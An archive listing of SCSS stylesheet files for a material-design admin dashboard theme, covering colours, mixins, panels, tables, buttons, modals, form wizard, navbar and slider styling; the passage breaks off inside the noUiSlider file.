_variables.scss 0000644 00000000755 15076416165 0007572 0 ustar 00 //Colors
$colors: ( red: #F44336, pink: #E91E63, purple: #9C27B0, deep-purple: #673AB7, indigo: #3F51B5, blue: #2196F3, light-blue: #03A9F4, cyan: #00BCD4, teal: #009688, green: #4CAF50, light-green: #8BC34A, lime: #CDDC39, yellow: #ffe821, amber: #FFC107, orange: #FF9800, deep-orange: #FF5722, brown: #795548, grey: #9E9E9E, blue-grey: #607D8B, black: #000000, white: #ffffff ) !default;
//Fonts Family
$navbar-font-family: 'Roboto', sans-serif;
$sidebar-font-family: 'Roboto', sans-serif; _pageloader.scss 0000644 00000000647 15076416165 0007725 0 ustar 00 .page-loader-wrapper {
z-index: 99999999;
position: fixed;
top: 0;
left: 0;
bottom: 0;
right: 0;
width: 100%;
height: 100%;
background: #eee;
overflow: hidden;
text-align: center;
p {
font-size: 13px;
margin-top: 10px;
font-weight: bold;
color: #444;
}
.loader {
position: relative;
top: calc(50% - 30px);
}
}
_bootstrapnotify.scss 0000644 00000000121 15076416165 0011053 0 ustar 00 .bootstrap-notify-container {
max-width: 320px;
text-align: center;
}
_panels.scss 0000644 00000004753 15076416165 0007106 0 ustar 00 .panel-group {
@each $key, $val in $colors {
.panel-col-#{$key} {
border: 1px solid $val;
.panel-title {
background-color: $val !important;
color: #fff;
}
.panel-body {
border-top-color: transparent !important;
}
}
}
.panel {
@include border-radius(0);
.panel-title {
.material-icons {
float: left;
line-height: 16px;
margin-right: 8px;
}
}
.panel-heading {
padding: 0;
@include border-radius(0);
a {
display: block;
padding: 10px 15px;
&:hover,
&:focus,
&:active {
text-decoration: none;
}
}
}
.panel-body {
color: #555;
}
}
.panel-primary {
border: 1px solid #1f91f3;
.panel-title {
background-color: #1f91f3;
}
}
.panel-success {
border: 1px solid #2b982b;
.panel-title {
background-color: #2b982b;
color: #fff;
}
}
.panel-warning {
border: 1px solid #ff9600;
.panel-title {
background-color: #ff9600;
color: #fff;
}
}
.panel-danger {
border: 1px solid #fb483a;
.panel-title {
background-color: #fb483a;
color: #fff;
}
}
}
.full-body {
@each $key, $val in $colors {
.panel-col-#{$key} {
.panel-body {
border-top-color: #fff !important;
background-color: $val;
color: #fff;
}
}
}
.panel-primary {
.panel-body {
border-top-color: #fff !important;
background-color: #1f91f3;
color: #fff;
}
}
.panel-success {
.panel-body {
border-top-color: #fff !important;
background-color: #2b982b;
color: #fff;
}
}
.panel-warning {
.panel-body {
border-top-color: #fff !important;
background-color: #ff9600;
color: #fff;
}
}
.panel-danger {
.panel-body {
border-top-color: #fff !important;
background-color: #fb483a;
color: #fff;
}
}
}
_dialogs.scss 0000644 00000000662 15076416165 0007241 0 ustar 00 .sweet-alert {
@include border-radius(0 !important);
p {
font-size: 14px !important;
}
.sa-input-error {
top: 23px !important;
right: 13px !important;
}
h2 {
font-size: 18px !important;
margin: 0 0 5px 0 !important;
}
button {
font-size: 15px !important;
@include border-radius(0 !important);
padding: 5px 20px !important;
}
}
style.scss 0000644 00000011366 15076416165 0006623 0 ustar 00 @import '_mixins';
@import '_variables';
/* Navbar ====================================== */
@import '_navbar';
/* Material Icons ============================== */
@import 'materialicons';
/* Helpers ===================================== */
@import '_helpers.scss';
/* Custom Animate ============================== */
@import '_customanimate.scss';
/* Demo ======================================== */
@import '_demo.scss';
/* Materialize Css | Taken from www.materializecss.com */
@import '../css/materialize.css';
/* Media ======================================= */
@import '_media.scss';
/* General ===================================== */
@import '_general.scss';
/* Dashboard =================================== */
@import '_dashboard.scss';
/* Buttons ===================================== */
@import '_buttons.scss';
/* Bootstrap Tags Input ======================== */
@import '_tagsinput.scss';
/* noUISlider ================================== */
@import '_noUISlider.scss';
/* Multi Select ================================ */
@import '_multiselect.scss';
/* Card ======================================== */
@import '_card.scss';
/* Infobox ===================================== */
@import '_infobox.scss';
/* Alerts ====================================== */
@import '_alerts.scss';
/* Dialogs (SweetAlert) ======================== */
@import '_dialogs.scss';
/* Checkbox & Radio ============================ */
@import '_checkboxradio.scss';
/* Switch ====================================== */
@import '_switch.scss';
/* DateTime Picker ============================= */
@import '_datetimepicker.scss';
/* Bootstrap Select ============================ */
@import '_bootstrapselect.scss';
/* Tooltip & Popovers ========================== */
@import '_tooltippopovers.scss';
/* Nav Tabs ==================================== */
@import '_navtabs.scss';
/* Thumbnails ================================== */
@import '_thumbnails.scss';
/* Modals ====================================== */
@import '_modals.scss';
/* Labels ====================================== */
@import '_labels.scss';
/* Collapse ==================================== */
@import '_collapse.scss';
/* Tables ====================================== */
@import '_tables.scss';
/* Panel ======================================= */
@import '_panels.scss';
/* Progress Bars =============================== */
@import '_progressbars.scss';
/* Ion Range Slider ============================ */
@import '_ionrangeslider.scss';
/* Input Group ================================= */
@import '_inputformgroup.scss';
/* Color Picker ================================ */
@import '_colorpicker.scss';
/* Dropzone ==================================== */
@import '_dropzone.scss';
/* Breadcrumbs ================================= */
@import '_breadcrumbs.scss';
/* Badge | List Group Item ===================== */
@import '_badgelistgroupitem.scss';
/* Pagination & Pager ========================== */
@import '_pagination.scss';
/* Media Object ================================ */
@import '_mediaobject.scss';
/* Form Wizard ================================= */
@import '_formwizard.scss';
/* Waves ======================================= */
@import '_waveseffect.scss';
/* Page Loader ================================= */
@import '_pageloader.scss';
/* Preloaders ================================== */
@import '_preloaders.scss';
/* Navbars ===================================== */
@import '_navbar.scss';
/* Dropdown Menu =============================== */
@import '_dropdownmenu.scss';
/* Left Sidebar & Overlay ====================== */
@import '_leftsidebaroverlay.scss';
/* Bootstrap Notify ============================ */
@import '_bootstrapnotify.scss';
/* Jquery Nestable ============================= */
@import '_jquerynestable.scss';
/* Login Page ================================== */
@import 'pages/_loginpage.scss';
/* Sign Up Page ================================ */
@import 'pages/_signuppage.scss';
/* Forgot Password Page ======================== */
@import 'pages/_forgotpasswordpage.scss';
/* 404 Not Found Page ========================== */
@import 'pages/_404.scss';
/* 500 Server Error Page ======================= */
@import 'pages/_500.scss';
/* Maps ======================================== */
@import '_maps.scss';
/* Charts ====================================== */
@import '_charts.scss';
/* Searchbar =================================== */
@import '_searchbar.scss';
/* Jquery DataTable ============================ */
@import '_jquerydatatable.scss';
/* Light Gallery ================================ */
@import '_lightgallery.scss';
/* For Internet Explorer 10 ===================== */
@import 'browser-support/_ie10.scss';
/* For Internet Explorer 11 ===================== */
@import 'browser-support/_ie11.scss'; _tables.scss 0000644 00000002567 15076416165 0007077 0 ustar 00 .table {
tbody {
tr {
td, th {
padding: 10px;
border-top: 1px solid #eee;
border-bottom: 1px solid #eee;
}
}
tr.primary {
td, th {
background-color: #1f91f3;
color: #fff;
}
}
tr.success {
td, th {
background-color: #2b982b;
color: #fff;
}
}
tr.info {
td, th {
background-color: #00b0e4;
color: #fff;
}
}
tr.warning {
td, th {
background-color: #ff9600;
color: #fff;
}
}
tr.danger {
td, th {
background-color: #fb483a;
color: #fff;
}
}
}
thead {
tr {
th {
padding: 10px;
border-bottom: 1px solid #eee;
}
}
}
}
.table-bordered {
border-top: 1px solid #eee;
tbody {
tr {
td, th {
padding: 10px;
border: 1px solid #eee;
}
}
}
thead {
tr {
th {
padding: 10px;
border: 1px solid #eee;
}
}
}
}
_switch.scss 0000644 00000001640 15076416165 0007115 0 ustar 00 .switch {
label {
font-weight: normal;
font-size: 13px;
.lever {
margin: 0 14px;
}
input[type=checkbox] {
&:checked {
@each $key, $val in $colors {
&:not(:disabled) {
~ .lever.switch-col-#{$key} {
&:active {
&:after {
box-shadow: 0 1px 3px 1px rgba(0, 0, 0, 0.4), 0 0 0 15px rgba($val, 0.1);
}
}
}
}
+ .lever.switch-col-#{$key} {
background-color: rgba($val, 0.5);
&:after {
background-color: $val;
}
}
}
}
}
}
}
_mixins.scss 0000644 00000003053 15076416165 0007123 0 ustar 00 @mixin border-radius($radius) {
-webkit-border-radius: $radius;
-moz-border-radius: $radius;
-ms-border-radius: $radius;
border-radius: $radius;
}
@mixin box-shadow($shadowinfo) {
-webkit-box-shadow: $shadowinfo;
-moz-box-shadow: $shadowinfo;
-ms-box-shadow: $shadowinfo;
box-shadow: $shadowinfo;
}
@mixin transform($transform) {
-moz-transform: $transform;
-ms-transform: $transform;
-o-transform: $transform;
-webkit-transform: $transform;
transform: $transform;
}
@mixin transition($transition) {
-moz-transition: $transition;
-o-transition: $transition;
-webkit-transition: $transition;
transition: $transition;
}
@mixin three-dots-overflow() {
white-space: nowrap;
-ms-text-overflow: ellipsis;
-o-text-overflow: ellipsis;
text-overflow: ellipsis;
overflow: hidden;
}
@mixin navbar-link-color($textcolor, $navbarcolor, $opacity) {
.navbar-brand,
.navbar-brand:hover,
.navbar-brand:active,
.navbar-brand:focus {
color: $textcolor;
}
.nav > li > a:hover,
.nav > li > a:focus,
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
background-color: transparentize($navbarcolor, $opacity);
}
.nav > li > a {
color: $textcolor;
}
.bars {
float: left;
padding: 10px 20px;
font-size: 22px;
color: $textcolor;
margin-right: 10px;
margin-left: -10px;
margin-top: 4px;
}
.bars:hover {
background-color: rgba(0,0,0,0.08);
}
}
_ionrangeslider.scss 0000644 00000000177 15076416165 0010625 0 ustar 00 .irs {
.irs-min,
.irs-max,
.irs-from,
.irs-to,
.irs-single {
@include border-radius(0);
}
}
_buttons.scss 0000644 00000004664 15076416165 0007323 0 ustar 00 .btn {
&:focus {
outline: none !important;
}
}
.btn-circle {
border: none;
outline: none !important;
overflow: hidden;
width: 40px;
height: 40px;
@include border-radius(50%);
i {
font-size: 18px;
position: relative;
left: -1px;
}
}
.btn-link {
font-weight: bold;
color: #333;
@include transition(.5s);
&:active,
&:focus {
text-decoration: none;
color: #333;
}
&:hover {
text-decoration: none;
color: #333;
background-color: #ddd;
}
}
.btn-circle-lg {
border: none;
outline: none !important;
overflow: hidden;
width: 50px;
height: 50px;
@include border-radius(50% !important);
i {
font-size: 26px !important;
position: relative !important;
left: 0px !important;
top: 6px !important;
}
}
.btn:not(.btn-link):not(.btn-circle) {
box-shadow: 0 2px 5px rgba(0,0,0,.16),0 2px 10px rgba(0,0,0,.12);
@include border-radius(2px);
border: none;
font-size: 13px;
outline: none;
&:hover {
outline: none;
}
i {
font-size: 20px;
position: relative;
top: 3px;
}
span {
position: relative;
top: -2px;
margin-left: 3px;
}
}
.btn-warning,
.btn-warning:hover,
.btn-warning:active,
.btn-warning:focus {
background-color: #ff9600 !important;
}
.btn-danger,
.btn-danger:hover,
.btn-danger:active,
.btn-danger:focus {
background-color: #fb483a !important;
}
.btn-info,
.btn-info:hover,
.btn-info:active,
.btn-info:focus {
background-color: #00b0e4 !important;
}
.btn-success,
.btn-success:hover,
.btn-success:active,
.btn-success:focus {
background-color: #2b982b !important;
}
.btn-primary,
.btn-primary:hover,
.btn-primary:active,
.btn-primary:focus {
background-color: #1f91f3 !important;
}
.btn-default,
.btn-default:hover,
.btn-default:active,
.btn-default:focus {
background-color: #fff !important;
}
.btn-group,
.btn-group-vertical {
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.16), 0 2px 10px rgba(0, 0, 0, 0.12);
.btn {
box-shadow: none !important;
@include border-radius(0);
.caret {
position: relative;
bottom: 1px;
}
}
.btn-group {
box-shadow: none !important;
}
.btn + .dropdown-toggle {
border-left: 1px solid rgba(0,0,0,0.08) !important;
}
}
_maps.scss 0000644 00000000213 15076416165 0006547 0 ustar 00 /* Google Maps */
.gmap {
width: 100%;
height: 400px;
}
/* jVector Map */
.jvector-map {
width: 100%;
height: 600px;
}
_modals.scss 0000644 00000001721 15076416165 0007073 0 ustar 00 .modal {
.modal-header {
border: none;
padding: 25px 25px 5px 25px;
.modal-title {
font-weight: bold;
font-size: 16px;
}
}
.modal-content {
@include border-radius(0);
box-shadow: 0 5px 20px rgba(0,0,0,.31) !important;
border: none;
.modal-body {
color: #777;
padding: 15px 25px;
}
}
.modal-footer {
border: none;
}
}
@each $key, $val in $colors {
.modal-col-#{$key} {
background-color: $val;
.modal-body,
.modal-title {
color: #fff !important;
}
.modal-footer {
background-color: rgba(0,0,0,0.12);
.btn-link {
color: #fff !important;
&:hover,
&:active,
&:focus {
background-color: rgba(0,0,0,0.12);
}
}
}
}
}
_formwizard.scss 0000644 00000016741 15076416165 0010010 0 ustar 00 .wizard,
.tabcontrol {
display: block;
width: 100%;
overflow: hidden;
}
.wizard a,
.tabcontrol a {
outline: 0;
}
.wizard ul,
.tabcontrol ul {
list-style: none !important;
padding: 0;
margin: 0;
}
.wizard ul > li, .tabcontrol ul > li {
display: block;
padding: 0;
}
/* Accessibility */
.wizard > .steps .current-info,
.tabcontrol > .steps .current-info,
.wizard > .content > .title,
.tabcontrol > .content > .title {
position: absolute;
left: -999em;
}
.wizard {
> .steps {
position: relative;
display: block;
width: 100%;
}
&.vertical {
> .steps {
float: left;
width: 30%;
}
> .steps > ul > li {
float: none;
width: 100%;
}
> .content {
float: left;
margin: 0 0 0.5em 0;
width: 70%;
}
> .actions {
float: right;
width: 100%;
}
> .actions > ul > li {
margin: 0 0 0 1em;
}
}
> {
.steps {
.number {
font-size: 1.429em;
}
> ul > li {
width: 25%;
float: left;
}
}
.actions > ul > li {
float: left;
}
}
> {
.steps {
a {
display: block;
width: auto;
margin: 0 0.5em 0.5em;
padding: 1em 1em;
text-decoration: none;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
&:hover, &:active {
display: block;
width: auto;
margin: 0 0.5em 0.5em;
padding: 1em 1em;
text-decoration: none;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
}
}
.disabled a {
background: #eee;
color: #aaa;
cursor: default;
&:hover, &:active {
background: #eee;
color: #aaa;
cursor: default;
}
}
.current a {
background: #2184be;
color: #fff;
cursor: default;
&:hover, &:active {
background: #2184be;
color: #fff;
cursor: default;
}
}
.done a {
background: #9dc8e2;
color: #fff;
&:hover, &:active {
background: #9dc8e2;
color: #fff;
}
}
.error a {
background: #ff3111;
color: #fff;
&:hover, &:active {
background: #ff3111;
color: #fff;
}
}
}
.content {
border: 1px solid #ddd;
display: block;
margin: 0.5em;
min-height: 35em;
overflow: hidden;
position: relative;
width: auto;
}
}
> {
.actions {
position: relative;
display: block;
text-align: right;
width: 100%;
}
}
> .actions > ul {
display: inline-block;
text-align: right;
> li {
margin: 0 0.5em;
}
}
> {
.actions {
a {
background: #009688;
color: #fff;
display: block;
padding: 0.5em 1em;
text-decoration: none;
@include border-radius(0);
&:hover, &:active {
background: #009688;
color: #fff;
display: block;
padding: 0.5em 1em;
text-decoration: none;
@include border-radius(0);
}
}
.disabled a {
background: #eee;
color: #aaa;
&:hover, &:active {
background: #eee;
color: #aaa;
}
}
}
}
}
.tabcontrol > {
.steps {
position: relative;
display: block;
width: 100%;
> ul {
position: relative;
margin: 6px 0 0 0;
top: 1px;
z-index: 1;
> li {
float: left;
margin: 5px 2px 0 0;
padding: 1px;
-webkit-border-top-left-radius: 5px;
-webkit-border-top-right-radius: 5px;
-moz-border-radius-topleft: 5px;
-moz-border-radius-topright: 5px;
border-top-left-radius: 5px;
border-top-right-radius: 5px;
&:hover {
background: #edecec;
border: 1px solid #bbb;
padding: 0;
}
&.current {
background: #fff;
border: 1px solid #bbb;
border-bottom: 0 none;
padding: 0 0 1px 0;
margin-top: 0;
> a {
padding: 15px 30px 10px 30px;
}
}
> a {
color: #5f5f5f;
display: inline-block;
border: 0 none;
margin: 0;
padding: 10px 30px;
text-decoration: none;
&:hover {
text-decoration: none;
}
}
}
}
}
.content {
position: relative;
display: inline-block;
width: 100%;
height: 35em;
overflow: hidden;
border-top: 1px solid #bbb;
padding-top: 20px;
> .body {
float: left;
position: absolute;
width: 95%;
height: 95%;
padding: 2.5%;
ul {
list-style: disc !important;
> li {
display: list-item;
}
}
}
}
}
.wizard {
.content {
min-height: 245px;
@include border-radius(0);
overflow-y: auto;
.body {
padding: 15px;
}
}
.steps {
a {
@include border-radius(0);
@include transition(.5s);
&:active,
&:focus,
&:hover {
@include border-radius(0);
}
}
.done {
a {
background-color: rgba(#009688, 0.6);
&:hover,
&:active,
&:focus {
background-color: rgba(#009688, 0.5);
}
}
}
.error {
a {
background-color: #F44336 !important;
}
}
.current {
a {
background-color: #009688;
&:active,
&:focus,
&:hover {
background-color: #009688;
}
}
}
}
}
_collapse.scss 0000644 00000000173 15076416165 0007416 0 ustar 00 .collapse,
.collapse.in,
.collapsing {
.well {
@include border-radius(0);
margin-bottom: 0;
}
}
_multiselect.scss 0000644 00000001203 15076416165 0010141 0 ustar 00 .ms-container {
width: auto !important;
.ms-list {
@include box-shadow(none !important);
@include border-radius(0 !important);
}
.ms-list.ms-focus {
@include box-shadow(none !important);
}
.ms-selectable,
.ms-selection {
min-width: 250px !important;
li.ms-hover {
color: #000000 !important;
background-color: #e6e6e6 !important;
}
li.ms-elem-selectable,
li.ms-elem-selection {
padding: 9px 15px 6px 15px !important;
}
}
.ms-optgroup-label {
padding: 5px 0 0 8px !important;
}
}
_tooltippopovers.scss 0000644 00000000717 15076416165 0011110 0 ustar 00 .tooltip {
font-size: 13px;
.tooltip-inner {
@include border-radius(0);
}
}
.popover {
@include border-radius(0);
border: 1px solid rgba(0, 0, 0, 0.08);
.popover-title {
font-weight: bold;
@include border-radius(0);
background-color: #e9e9e9;
border-bottom: 1px solid #ddd;
}
.popover-content {
font-size: 13px;
color: #777;
@include border-radius(0);
}
}
_demo.scss 0000644 00000014207 15076416165 0006543 0 ustar 00 //===================================================================================
//BUTTONS
.demo-button-sizes {
.btn {
margin-bottom: 5px;
}
}
.icon-button-demo {
button {
margin-right: 5px;
margin-bottom: 12px;
}
}
.icon-and-text-button-demo {
button {
margin-right: 5px;
margin-bottom: 12px;
width: 16.66666666666667%;
}
}
.button-demo {
ul {
padding-left: 0;
li {
list-style: none;
padding-left: 0;
display: inline-block;
margin-right: 7px;
.btn {
display: block;
min-width: 175px;
}
}
}
.btn {
margin-right: 8px;
margin-bottom: 13px;
min-width: 120px;
}
}
.demo-button-groups {
.btn-group {
margin-right: 10px;
}
}
.demo-button-toolbar {
.btn-toolbar {
float: left;
margin-right: 25px;
}
}
.demo-button-nesting {
> .btn-group {
margin-right: 15px;
}
}
.demo-single-button-dropdowns {
> .btn-group {
margin-right: 10px;
}
}
.demo-splite-button-dropdowns {
> .btn-group {
margin-right: 10px;
}
}
.demo-dropup {
.dropup {
margin-right: 10px;
}
}
//=====================================================================================
//=====================================================================================
//CHECKBOX & RADIO
.demo-checkbox,
.demo-radio-button {
label {
min-width: 150px;
}
}
//=====================================================================================
//=====================================================================================
//JQUERY KNOB-CHART
.demo-knob-chart {
div {
margin-right: 15px;
}
}
//=====================================================================================
//=====================================================================================
//SWITCH
.demo-switch {
.switch {
display: inline-block;
min-width: 170px;
}
.demo-switch-title {
min-width: 95px;
display: inline-block;
}
}
//=====================================================================================
//=====================================================================================
//COLOR BOX
.demo-color-box {
padding: 15px 0;
text-align: center;
margin-bottom: 20px;
@include border-radius(3px);
.color-name {
font-size: 16px;
margin-bottom: 5px;
}
.color-code,
.color-class-name {
font-size: 13px;
}
}
//=====================================================================================
//=====================================================================================
//IMAGES
.demo-image-copyright {
text-align: right;
font-style: italic;
font-size: 12px;
color: #777;
margin: 5px 0 10px 0;
a {
font-weight: bold;
color: #555 !important;
}
}
//=====================================================================================
//=====================================================================================
//TAGS INPUT
.demo-tagsinput-area {
margin-bottom: 50px !important;
}
//=====================================================================================
//=====================================================================================
//GOOGLE MATERIAL DESIGN ICON
.demo-icon-container {
.demo-google-material-icon {
margin-bottom: 5px;
text-align: left;
.icon-name {
position: relative;
top: -8px;
left: 7px;
}
.material-icons {
width: 24px;
}
}
}
//=====================================================================================
//=====================================================================================
//PRELOADERS
.demo-preloader {
.preloader {
margin-right: 10px;
}
}
//=====================================================================================
//=====================================================================================
//ION RANGE SLIDER
.irs-demo {
margin-bottom: 40px;
.irs {
margin-top: 15px;
}
}
//=====================================================================================
//=====================================================================================
//RIGHT SIDEBAR
.right-sidebar {
.nav-tabs + .tab-content {
padding: 0;
}
p {
margin: 20px 15px 15px 15px;
font-weight: bold;
text-align: center;
}
#settings {
.setting-list {
list-style: none;
padding-left: 0;
margin-bottom: 20px;
li {
padding: 15px;
position: relative;
border-top: 1px solid #eee;
.switch {
position: absolute;
top: 15px;
right: 5px;
}
}
}
}
}
.demo-choose-skin {
list-style: none;
padding-left: 0;
overflow-y: hidden;
li {
border-bottom: 1px solid #eee;
padding: 10px 10px 4px 10px;
position: relative;
cursor: pointer;
&.active {
background-color: #eee;
&:after {
font-family: 'Material Icons';
position: absolute;
top: 10px;
right: 10px;
content: '\E876';
font-size: 18px;
font-weight: bold;
}
}
&:hover {
background-color: #eee;
}
div {
width: 24px;
height: 24px;
display: inline-block;
@include border-radius(3px);
}
span {
position: relative;
bottom: 7px;
left: 5px;
}
}
@each $key, $val in $colors {
.#{$key} {
background-color: $val;
}
}
}
//=====================================================================================
_breadcrumbs.scss 0000644 00000002154 15076416165 0010106 0 ustar 00 .breadcrumb {
@include border-radius(0);
background-color: transparent;
font-size: 13px;
margin-bottom: 10px;
li {
a {
color: #444;
text-decoration: none;
.material-icons {
font-size: 18px;
position: relative;
top: 4px;
}
}
.material-icons {
font-size: 18px;
position: relative;
top: 4px;
}
}
> li + li:before {
content: '>\00a0';
}
}
@each $key, $val in $colors {
.breadcrumb-col-#{$key} {
li {
a {
color: $val !important;
font-weight: bold;
}
}
}
.breadcrumb-bg-#{$key} {
background-color: $val !important;
li {
a {
color: #fff;
font-weight: bold;
.material-icons {
padding-bottom: 8px;
}
}
color: #fff !important;
}
li + li:before {
color: #fff;
}
}
}
_helpers.scss 0000644 00000003602 15076416166 0007257 0 ustar 00 //Margin
@for $i from -25 through 25 {
.m-l-#{$i * 5} {
margin-left: #{$i * 5}px;
}
.m-t-#{$i * 5} {
margin-top: #{$i * 5}px;
}
.m-r-#{$i * 5} {
margin-right: #{$i * 5}px;
}
.m-b-#{$i * 5} {
margin-bottom: #{$i * 5}px;
}
}
.margin-0 {
margin: 0;
}
@for $i from 0 through 25 {
.p-l-#{$i * 5} {
padding-left: #{$i * 5}px;
}
.p-t-#{$i * 5} {
padding-top: #{$i * 5}px;
}
.p-r-#{$i * 5} {
padding-right: #{$i * 5}px;
}
.p-b-#{$i * 5} {
padding-bottom: #{$i * 5}px;
}
}
.padding-0 {
padding: 0;
}
@for $i from 5 through 49 {
.font-#{$i + 1} {
font-size: #{$i + 1}px;
}
}
.align-left {
text-align: left;
}
.align-center {
text-align: center;
}
.align-right {
text-align: right;
}
.align-justify {
text-align: justify;
}
.no-resize {
resize: none;
}
.font-bold {
font-weight: bold;
}
.font-italic {
font-style: italic;
}
.font-underline {
text-decoration: underline;
}
.font-line-through {
text-decoration: line-through;
}
.font-overline {
text-decoration: overline;
}
.block-header {
margin-bottom: 15px;
h2 {
margin: 0 !important;
color: #666 !important;
font-weight: normal;
font-size: 16px;
small {
display: block;
font-size: 12px;
margin-top: 8px;
color: #888;
a {
font-weight: bold;
color: #777;
}
}
}
}
@each $key, $val in $colors {
.bg-#{$key} {
background-color: $val !important;
color: #fff;
.content {
.text,
.number {
color: #fff !important;
}
}
}
}
@each $key, $val in $colors {
.col-#{$key} {
color: $val !important;
}
}
_navbar.scss 0000644 00000004527 15076416166 0007075 0 ustar 00 .navbar {
font-family: $navbar-font-family;
@include border-radius(0);
@include box-shadow(0 1px 5px rgba(0,0,0,.3));
border: none;
position: fixed;
top: 0;
left: 0;
z-index: 12;
width: 100%;
.navbar-brand {
@include three-dots-overflow();
}
.navbar-custom-right-menu {
float: right;
}
.navbar-toggle {
text-decoration: none;
color: #fff;
width: 20px;
height: 20px;
margin-top: -4px;
margin-right: 17px;
&:before {
content: '\E8D5';
font-family: 'Material Icons';
font-size: 26px;
}
}
.navbar-collapse {
&.in {
overflow: visible;
}
}
}
.ls-closed {
.sidebar {
margin-left: -300px;
}
section.content {
margin-left: 15px;
}
.bars {
&:after,
&:before {
font-family: 'Material Icons';
font-size: 24px;
position: absolute;
top: 18px;
left: 20px;
margin-right: 10px;
@include transform(scale(0));
@include transition(all .3s);
}
&:before {
content: '\E5D2';
@include transform(scale(1));
}
&:after {
content: '\E5C4';
@include transform(scale(0));
}
}
.navbar-brand {
margin-left: 30px;
}
}
.overlay-open {
.bars {
&:before {
@include transform(scale(0));
}
&:after {
@include transform(scale(1));
}
}
}
.navbar-header {
padding: 10px 7px;
.bars {
float: left;
text-decoration: none;
}
}
.navbar-nav {
> li {
> a {
padding: 7px 7px 2px 7px;
margin-top: 17px;
margin-left: 5px;
}
}
.dropdown-menu {
margin-top: -40px !important;
}
}
.label-count {
position: absolute;
top: 2px;
right: 6px;
font-size: 10px;
line-height: 15px;
background-color: #000;
padding: 0 4px;
@include border-radius(3px);
}
@each $key, $val in $colors {
.col-#{$key} {
.navbar {
@include navbar-link-color(#fff, #000, .95);
// @include navbar-link-color(rgba(0,0,0,0.85), #000, .95);
}
}
}
_thumbnails.scss 0000644 00000000301 15076416166 0007754 0 ustar 00 .thumbnail {
@include border-radius(0);
p:not(button) {
color: #999999;
font-size: 14px;
}
h3 {
font-weight: bold;
font-size: 17px;
}
}
_datetimepicker.scss 0000644 00000001372 15076416166 0010611 0 ustar 00 .dtp {
div.dtp-date,
div.dtp-time {
background: #007d72;
}
> .dtp-content {
> .dtp-date-view {
> header.dtp-header {
background: #009688;
}
}
}
.dtp-buttons {
.dtp-btn-ok {
margin-left: 10px;
}
.dtp-btn-clear {
margin-right: 10px !important;
}
}
.p10 {
> a {
color: #fff;
}
}
div.dtp-actual-year {
font-size: 1.5em;
color: #ffffff;
}
table.dtp-picker-days {
tr {
td {
a.selected {
background: #007d72;
color: #fff;
}
}
}
}
}
_lightgallery.scss 0000644 00000000160 15076416166 0010300 0 ustar 00 .lg-outer {
.lg-thumb-item,
.lg-toogle-thumb {
@include border-radius(0 !important);
}
}
_noUISlider.scss 0000644 00000012045 15076416166 0007633 0 ustar 00 .noUi-target {
-webkit-touch-callout: none;
-webkit-user-select: none;
-ms-touch-action: none;
touch-action: none;
-ms-user-select: none;
-moz-user-select: none;
user-select: none;
-moz-box-sizing: border-box;
box-sizing: border-box;
position: relative;
direction: ltr;
* {
-webkit-touch-callout: none;
-webkit-user-select: none;
-ms-touch-action: none;
touch-action: none;
-ms-user-select: none;
-moz-user-select: none;
user-select: none;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
}
.noUi-base {
width: 100%;
height: 100%;
position: relative;
z-index: 1;
}
.noUi-origin {
position: absolute;
right: 0;
top: 6px;
left: 0;
bottom: 0;
}
.noUi-handle {
position: relative;
z-index: 1;
}
.noUi-stacking {
.noUi-handle {
z-index: 10;
}
}
.noUi-state-tap {
.noUi-origin {
-webkit-transition: left 0.25s, top 0.25s;
transition: left 0.25s, top 0.25s;
}
}
.noUi-state-drag * {
cursor: inherit !important;
}
.noUi-base {
-webkit-transform: translate3d(0, 0, 0);
transform: translate3d(0, 0, 0);
}
.noUi-horizontal {
height: 18px;
.noUi-handle {
width: 34px;
height: 28px;
left: -17px;
top: -6px;
}
}
.noUi-vertical {
width: 18px;
.noUi-handle {
width: 28px;
height: 34px;
left: -6px;
top: -17px;
}
}
.noUi-background {
background: #FAFAFA;
box-shadow: inset 0 1px 1px #f0f0f0;
}
.noUi-connect {
background: #3FB8AF;
box-shadow: inset 0 0 3px rgba(51, 51, 51, 0.45);
-webkit-transition: background 450ms;
transition: background 450ms;
}
.noUi-origin {
border-radius: 2px;
}
.noUi-target {
border-radius: 4px;
border: 1px solid #D3D3D3;
box-shadow: inset 0 1px 1px #F0F0F0, 0 3px 6px -5px #BBB;
&.noUi-connect {
box-shadow: inset 0 0 3px rgba(51, 51, 51, 0.45), 0 3px 6px -5px #BBB;
}
}
.noUi-dragable {
cursor: w-resize;
}
.noUi-vertical .noUi-dragable {
cursor: n-resize;
}
.noUi-handle {
border: 1px solid #D9D9D9;
border-radius: 3px;
background: #FFF;
cursor: default;
box-shadow: inset 0 0 1px #FFF, inset 0 1px 7px #EBEBEB, 0 3px 6px -3px #BBB;
}
.noUi-active {
box-shadow: inset 0 0 1px #FFF, inset 0 1px 7px #DDD, 0 3px 6px -3px #BBB;
}
.noUi-handle {
&:before {
content: "";
display: block;
position: absolute;
height: 14px;
width: 1px;
background: #E8E7E6;
left: 14px;
top: 6px;
}
&:after {
content: "";
display: block;
position: absolute;
height: 14px;
width: 1px;
background: #E8E7E6;
left: 14px;
top: 6px;
left: 17px;
}
}
.noUi-vertical .noUi-handle {
&:before {
width: 14px;
height: 1px;
left: 6px;
top: 14px;
}
&:after {
width: 14px;
height: 1px;
left: 6px;
top: 14px;
top: 17px;
}
}
[disabled] {
&.noUi-connect, .noUi-connect {
background: #B8B8B8;
}
&.noUi-origin, .noUi-handle {
cursor: not-allowed;
}
}
.noUi-target {
box-shadow: none;
border: none;
}
.noUi-base {
height: 15px;
top: -6px;
}
.noUi-background {
height: 3px;
top: 6px;
background-color: #bfbfbf;
box-shadow: none;
}
.noUi-horizontal {
height: 3px;
}
.noUi-connect {
height: 3px;
top: 6px;
background-color: #26A69A;
box-shadow: none;
}
.noUi-horizontal .noUi-handle {
width: 15px;
height: 15px;
border-radius: 50%;
box-shadow: none;
background-color: #26A69A;
border: none;
left: -5px;
top: -6px;
transition: width 0.2s cubic-bezier(0.215, 0.61, 0.355, 1), height 0.2s cubic-bezier(0.215, 0.61, 0.355, 1), left 0.2s cubic-bezier(0.215, 0.61, 0.355, 1), top 0.2s cubic-bezier(0.215, 0.61, 0.355, 1);
}
.noUi-handle {
&:before, &:after {
content: none;
}
}
.noUi-target {
.noUi-active {
&.noUi-handle {
@include box-shadow(0 0 20px rgba(0,0,0,0.5));
}
}
